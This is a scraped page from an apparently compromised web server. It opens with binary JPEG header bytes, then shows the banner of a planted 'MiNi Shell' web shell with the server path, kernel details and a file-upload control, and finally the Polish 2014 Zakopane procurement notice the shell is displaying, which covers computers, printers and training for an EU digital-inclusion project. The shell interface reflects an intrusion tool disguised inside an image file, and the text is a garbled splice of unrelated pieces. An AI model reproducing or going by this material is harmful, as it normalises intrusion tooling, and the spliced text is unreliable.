JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141017/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20141017/346352-N-2014.html

<p class="kh_header"><b>Zakopane: BZP.271.81.2014- dostawa zestawów komputerowych, komputerów przenośnych z oprogramowaniem, drukarkami oraz przeszkolenie beneficjentów ostatecznych w ramach realizacji projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Innowacyjna Gospodarka Priorytet: VIII. Społeczeństwo informacyjne - zwiększanie innowacyjności gospodarki Działanie: 8.3. Przeciwdziałanie wykluczeniu cyfrowemu - eInclusion</b><br>
<b>Numer ogłoszenia: 346352 - 2014; data zamieszczenia: 17.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Zakopane , ul. T. Kościuszki 13, 34-500 Zakopane, woj. małopolskie, tel. 018 2020448, faks 018 2020448.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.zakopane.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BZP.271.81.2014- dostawa zestawów komputerowych, komputerów przenośnych z oprogramowaniem, drukarkami oraz przeszkolenie beneficjentów ostatecznych w ramach realizacji projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Innowacyjna Gospodarka Priorytet: VIII. Społeczeństwo informacyjne - zwiększanie innowacyjności gospodarki Działanie: 8.3. Przeciwdziałanie wykluczeniu cyfrowemu - eInclusion.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa zestawów komputerowych, komputerów przenośnych z oprogramowaniem, drukarkami oraz przeszkolenie beneficjentów ostatecznych w ramach realizacji projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Innowacyjna Gospodarka Priorytet VIII. Społeczeństwo informacyjne - zwiększanie innowacyjności gospodarki Działanie 8.3. Przeciwdziałanie wykluczeniu cyfrowemu - eInclusion realizowane jest na podstawie umowy zawartej z Władzą Wdrażającą Programy Europejskie nr POIG.08.03.00-12-524 12-00 z dnia 04 lipca 2014 roku.

Przedmiot zamówienia obejmuje



ETAP A
Zakup, instalację i konfigurację stacjonarnych zestawów komputerowych z drukarkami i oprogramowaniem systemy operacyjne, oprogramowanie antywirusowe z kontrolą rodzicielską, oprogramowanie biurowe z przeznaczeniem dla 44 gospodarstw domowych z terenu Gminy Miasto Zakopane. 

44 sztuk zestawów komputerowych stacjonarnych z systemem operacyjnym
44 szt. monitor
44 szt. klawiatura
44 szt. myszka
44 sztuk drukarek
44 szt. pakiet biurowy
44 szt. program zabezpieczający - program antywirusowy
44 szt. program ochrony rodzicielskiej
44 szt. licencji praw najmu
Szczegółowy opis przedmiotu zamówienia określa załącznik nr 1 do niniejszej siwz. 

Zakup, instalację i konfigurację przenośnych komputerów z drukarkami i oprogramowaniem systemy operacyjne, oprogramowanie antywirusowe z kontrolą rodzicielską, oprogramowanie biurowe z przeznaczeniem dla 16 gospodarstw domowych z terenu Gminy Miasto Zakopane.

16 szt. komputerów przenośnych z systemem operacyjnym
16 szt. drukarek
16 szt. myszka
16 szt. pakiet biurowy
16 szt. program zabezpieczający- program antywirusowy
16 szt. program ochrony rodzicielskiej
16 szt. licencji praw najmu
Szczegółowy opis przedmiotu zamówienia określa załącznik nr 1 do niniejszej siwz.

Zakup, instalację i konfigurację przenośnych komputerów z drukarkami i oprogramowaniem systemy operacyjne, oprogramowanie antywirusowe, oprogramowanie biurowe z przeznaczeniem dla 2 jednostek organizacyjnych podległych Gminie Miasto Zakopane tj. Gimnazjum nr 2 w Zakopanem oraz Gimnazjum nr 3 w Zakopanem po 20 szt. Dla każdej jednostki, łącznie 40 sztuk. 

40 szt. komputerów przenośnych z systemem operacyjnym
40 szt. drukarek
40 szt. myszka
40 szt. pakiet biurowy
40 szt. program zabezpieczający- program antywirusowy
Szczegółowy opis przedmiotu zamówienia określa załącznik nr 1 do niniejszej siwz.

Gwarancja dla dostarczonego sprzętu i oprogramowania.
Szczegółowy opis przedmiotu zamówienia określa załącznik nr 1 do niniejszej  siwz
Przeprowadzenie dwóch szkoleń z zakresu obsługi komputera i korzystania z Internetu w tym
szkolenie numer 1 - czterodniowy cykl szkoleniowy dla 60 beneficjentów i 2 pracowników jednostek organizacyjnych Gminy Miasto Zakopane. Łącznie 62 uczestników, prowadzone na terenie Miasta Zakopane, 24 godziny lekcyjne zajęć.
Szczegółowy opis przedmiotu zamówienia określa załącznik nr 1 do niniejszej  siwz

ETAP B 

szkolenie numer 2 - jednodniowy cykl szkoleniowy dla 60 beneficjentów i 2 pracowników jednostek organizacyjnych Gminy Miasto Zakopane. Łącznie 62 uczestników, prowadzone na terenie Miasta Zakopane,  6 godzin lekcyjnych zajęć. 

Szczegółowy opis przedmiotu zamówienia określa załącznik nr 1 do niniejszej  siwz


Wymagania zamawiającego związane z  przedmiotem  zamówienia

Zamawiający wymaga, aby dostarczony sprzęt był fabrycznie nowy nie może nosić znamion użycia, musi być sprawny i posiadać wyposażenie niezbędne do funkcjonalnego działania oraz musi spełniać normy energooszczędności.
Poszczególne części składowe stanowiące przedmiot zamówienia winne być ze sobą kompatybilne.
Wykonawca dokona rozpakowania, instalacji, konfiguracji sprzętu komputerowego wraz z wymaganym oprogramowaniem rozpakowanie 62 szt. w tym; 18 szt. komp. przenośne, 44 komputery stacjonarne tak aby były one gotowe do pracy w trakcie szkolenia nr 1 i aby nie była konieczna ingerencja Zamawiającego.
Wykonawca dokona spakowania i ponownej instalacji, konfiguracji sprzętu komputerowego wraz z wymaganym oprogramowaniem po zakończonym Szkoleniu nr 1 u Beneficjentów tak aby był on gotowy do pracy po przekazaniu beneficjentowi ostatecznemu i aby nie była konieczna ingerencja Zamawiającego.
- Instalacja 60 zestawów w gospodarstwach domowych na terenie Miasta Zakopane 16 szt. komp. przenośne, 44 stacjonarne, drukarki
- Instalacja 40 zestawów komp. przenośne, drukarki w 2 Gimnazjach na terenie Miasta Zakopanego
Koszty opłat ponosi wykonawca i są one wliczone w cenę ogólną. Wszystkie programy wymagające aktywizacji winny być aktywowane najpóźniej w momencie uruchomienia sprzętu komputerowego.
Wykonawca zobowiązany jest do zainstalowania wymaganego w SIWZ oprogramowania oraz konfiguracji i uruchomienia sprzętu
Opakowanie oraz sprzęt komputerowy muszą posiadać numery seryjne, które zostaną w trakcie Szkolenia nr 1 przypisane konkretnemu użytkownikowi końcowemu - Beneficjentowi Ostatecznemu. Wykonawca wraz ze sprzętem dostarczy listę numerów seryjnych dostarczonych urządzeń w wersji papierowej i elektronicznej  xls na CD lub Pendrive, w podziale min. na  komputer stacjonarny ,  komputer przenośny,  drukarka, monitor
Wymagania ogólne dla wszystkich urządzeń informatycznych
Wszystkie oferowane urządzenia muszą być fabrycznie nowe.
Wszystkie oferowane urządzenia muszą być wyprodukowane zgodnie z obowiązującymi normami jakości
 Urządzenia muszą być dostarczone Zamawiającemu w oryginalnych opakowaniach fabrycznych.
 Do każdego urządzenia musi być dostarczony komplet standardowej dokumentacji w formie papierowej lub elektronicznej.
Do każdego urządzenia musi być dostarczony komplet nośników umożliwiających odtworzenie oprogramowania zainstalowanego w urządzeniu.
Wszystkie urządzenia mają  zostać  dostarczone z niezbędnym okablowanie zasilającym i transmisyjnym.

Zamawiający informuje, że wszystkie nazwy ujęte w SIWZ i jej załącznikach  są nazwami przykładowymi pozwalającymi  wykonawcy zastosowanie równoważnych lub zamiennych klas, typów, firm  z zastrzeżeniem, że sprzęt  równoważny  nie może  być o  gorszych parametrach technicznych. Do oferty należy załączyć dokumenty określające parametry techniczne elementów zastosowanych jako równoważne. Zastosowane elementy jako równoważne muszą posiadać certyfikaty bezpieczeństwa. Równoważność oznacza, że przedmiot zamówienia, zaoferowany przez Wykonawcę, posiada wszystkie cechy techniczne i jakościowe przedmiotu określonego przez Zamawiającego a różni się od niego znakiem towarowym, patentem lub pochodzeniem. Jako równoważne Zamawiający uzna produkty - których jakość jest zgodna z wymaganiami normowymi, atestami, świadectwami; dopuszczenia produktów opisanych przez Zamawiającego; o takim samym przeznaczeniu; tożsame tematycznie; które nie obniżą określonych w opisie przedmiotu zamówienia standardów; które mają wymiary liczbę elementów wskazane przez Zamawiającego. Wykazanie równoważności zaoferowanego produktu w tym m.in. proponowane materiały, urządzenia leży po stronie oferenta, który jest zobowiązany wykazać, że oferowane przez niego składowe zamówienia spełniają wymagania określone przez Zamawiającego w SWZ. W takim przypadku należy załączyć do oferty opis tych materiałów i urządzeń aby odpowiadały one wymaganiom postawionym w SIWZ. 


Zamawiający informuje, że źródłem  współfinansowania zamówienia jest Europejski Fundusz Rozwoju Regionalnego w ramach Programu Operacyjnego Innowacyjna Gospodarka, 8. Oś Priorytetowa Społeczeństwo informacyjne - zwiększanie innowacyjności gospodarki, Działanie 8.3 Przeciwdziałanie wykluczeniu cyfrowemu - eInclusion..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5, 30.23.00.00-0, 48.31.00.00-4, 51.60.00.00-8, 45.31.43.20-0, 48.62.00.00-0, 48.62.40.00-8, 80.53.31.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 60.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy wykonawca jest zobowiązany wnieść wadium przetargowe w wysokości:   
10 000 ,00  zł  ( słownie:  dziesięć tysięcy złotych 00/100 gr)
Wadium może być wnoszone w jednej lub w kilku  następujących formach: 
       - pieniądzu;
       - poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
      -  gwarancjach bankowych;
      -  gwarancjach ubezpieczeniowych;
      -  poręczeniach udzielanych przez podmioty, o których mowa w art. 6 lit. b ust. 5 
pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju   Przedsiębiorczości (Dz.U. z 2007r. Nr 42 poz.275 z późn. zm.)

Wadium przetargowe w  pieniądzu należy wnieść  przelewem na konto Urzędu Miasta Zakopane w PEKAO S.A. w Zakopanem nr: 85 1240 4748 1111 0000  4871 8666   
Wadium powinno znajdować się na koncie zamawiającego najpóźniej  w terminie składania ofert tj.  27 października 2014 r. do godz.  12°°

Wadium wnoszone w pozostałych formach należy złożyć w postaci oryginału,   najpóźniej w terminie składania ofert tj. 27 października 2014 r. do godz. 12°° w  Biurze ds. zamówień publicznych pok. nr 8 (parter).


UWAGA!!! 
Nie wolno oryginałów tych dokumentów wkładać do oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu.

 Ocena spełnienia powyższego  warunku  będzie dokonywana w oparciu o wymagane  dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony ,jeżeli  wykonawca wykaże ,ze w ciągu ostatnich 3 lat przed upływem  terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy w tym okresie  zrealizował  co najmniej dwie dostawy sprzętu komputerowego wraz z jego instalacją o wartości nie mniejszej niż 150.000 zł brutto każda z załączeniem dowodów potwierdzających , że  wykazane   dostawy   zostały  zrealizowane należycie. 
 
Ocena spełnienia powyższego  warunku  będzie dokonana w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu.

 Ocena spełnienia powyższego  warunku  będzie dokonywana w oparciu o wymagane  dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu.

 Ocena spełnienia powyższego  warunku  będzie dokonywana w oparciu o wymagane  dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu.

 Ocena spełnienia powyższego  warunku  będzie dokonywana w oparciu o wymagane  dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W celu potwierdzenia, że oferowany sprzęt odpowiada wymaganiom zamawiającego opisanych  w siwz, wykonawca ma do oferty  załączyć  dokładny opis ( marka, producent , specyfikacje techniczna, parametry, itp.) proponowanego sprzętu i proponowanego oprogramowania - należy wypełnić załącznik do druku oferty stanowiącego załącznik nr 3 do siwz.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W oparciu o art. 144 ust. 1 ustawy zamawiający informuje, że przewiduje możliwość zmiany umowy w następujących przypadkach: 

1) zmiana terminu realizacji zamówienia oraz terminów wynikających z harmonogramu będzie możliwa w przypadku: 
a) zmiany przepisów powodujących konieczność uzyskania dokumentów, które te przepisy narzucają, w takim przypadku termin realizacji umowy zostanie wydłużony o czas niezbędny potrzebny do uzyskania tych dokumentów, 
b) zaistnieje przerwa w realizacji zamówienia z przyczyn niezależnych od Wykonawcy, w szczególności działania siły wyższej, wywołane przez czynniki zewnętrzne, które uniemożliwiłyby terminowe wykonanie zobowiązań. Strony zobowiązuję się do ustalenia odpowiednio zmienionego terminu wykonania przedmiotu zamówienia o okres odpowiadający okresowi zaistniałej przerwy;
c) zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności: zdolnościami płatniczymi; warunki organizacyjne; okoliczności, które nie były możliwe do przewidzenia w chwili zawarcia umowy; 
w takiej sytuacji termin realizacji umowy zostanie wydłużony, o czas na który w/w okoliczności wstrzymały realizację umowy. 

2) zmiana sposobu spełnienia świadczenia (rozwiązania zamienne) będzie możliwa w przypadku: 
a) konieczności zmiany sprzętu, urządzeń, w sytuacji gdy wykorzystanie sprzętu, urządzeń, wskazanych w dokumentacji lub ofercie stanie się niemożliwe z powodu zaprzestania produkcji, wycofania z rynku lub zastąpienia innymi; powyższa zmiana umowy jest dopuszczalna pod warunkiem zmiany na materiały, urządzenia i sprzęt, posiadające co najmniej takie parametry jakościowe i cechy użytkowe, jak te, które stanowiły podstawę wyboru oferty pod warunkiem niezwiększania ceny. 
b) zmian legislacyjnych przepisów aktów prawnych normujących wykonanie przedmiotu zamówienia, w takim przypadku sposób spełnienia świadczenia zostanie zmieniony na zgodny z obowiązującymi przepisami w tym zakresie.
c) gdy konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym, a inną niż Wykonawca stroną, w szczególności Władzą Wdrażającą, a także innymi instytucjami, które na podstawie przepisów prawa mogą wpływać na realizację zamówienia; 
d) gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych dotyczących Programu Operacyjnego Innowacyjna Gospodarka lub wytycznych i zaleceń Władzy Wdrażającej; 
e) w zakresie lokalizacji świadczenia usługi w przypadku zmiany lub przeprowadzki Beneficjenta ostatecznego projektu w ramach granic administracyjnych gminy. 
3) zmiana wartości umowy brutto będzie możliwa w przypadku: 
a) ustawowej zmiany stawki podatku VAT, w takiej sytuacji wartość umowy brutto zostanie zmieniona na wyliczoną w oparciu o aktualne przepisy dotyczące naliczania podatku VAT,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zakopane.eu pod linkiem Zamówienia publiczne postępowania poniżej wartości art.11.8<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Współpracy Europejskiej Urząd Miasta Zakopane ul. Kościuszki 13 34-500 Zakopane..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.10.2014 godzina 12:00, miejsce: Biuro ds zamówień publicznych pok. 8 Urząd Miasta Zakopane ul. Kościuszki 13 34-
500 Zakopane..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Innowacyjna Gospodarka Priorytet: VIII. Społeczeństwo informacyjne - zwiększanie innowacyjności gospodarki Działanie: 8.3. Przeciwdziałanie wykluczeniu cyfrowemu - eInclusion realizowane jest na podstawie umowy zawartej z Władzą Wdrażającą Programy Europejskie nr POIG.08.03.00-12-524/12-00 z dnia 04 lipca 2014 roku.
Wymagany termin wykonania zamówienia: przewidywany termin rozpoczęcia: od podpisania umowy tj;
ETAP A
1. w zakresie dostawy zestawów komputerowych stacjonarnych i przenośnych  z drukarkami z przeznaczeniem dla gospodarstw domowych i jednostek organizacyjnych Gminy Miasto Zakopane - 30 dni od zawarcia umowy. 
2. w zakresie dostawy oprogramowania do zestawów komputerowych stacjonarnych i przenośnych  (systemy operacyjne, oprogramowanie antywirusowe z kontrolą rodzicielską, oprogramowanie biurowe) - 30 dni od zawarcia umowy. 
3. w zakresie przeprowadzenia szkoleń dla beneficjentów ostatecznych projektów; szkolenie numer 1  do 30 dni od zawarcia umowy 

ETAP B - szkolenie numer 2 -  w terminie od 10.03.2015 do 30.04.2015

Przez wymagany termin realizacji należy rozumieć, iż:
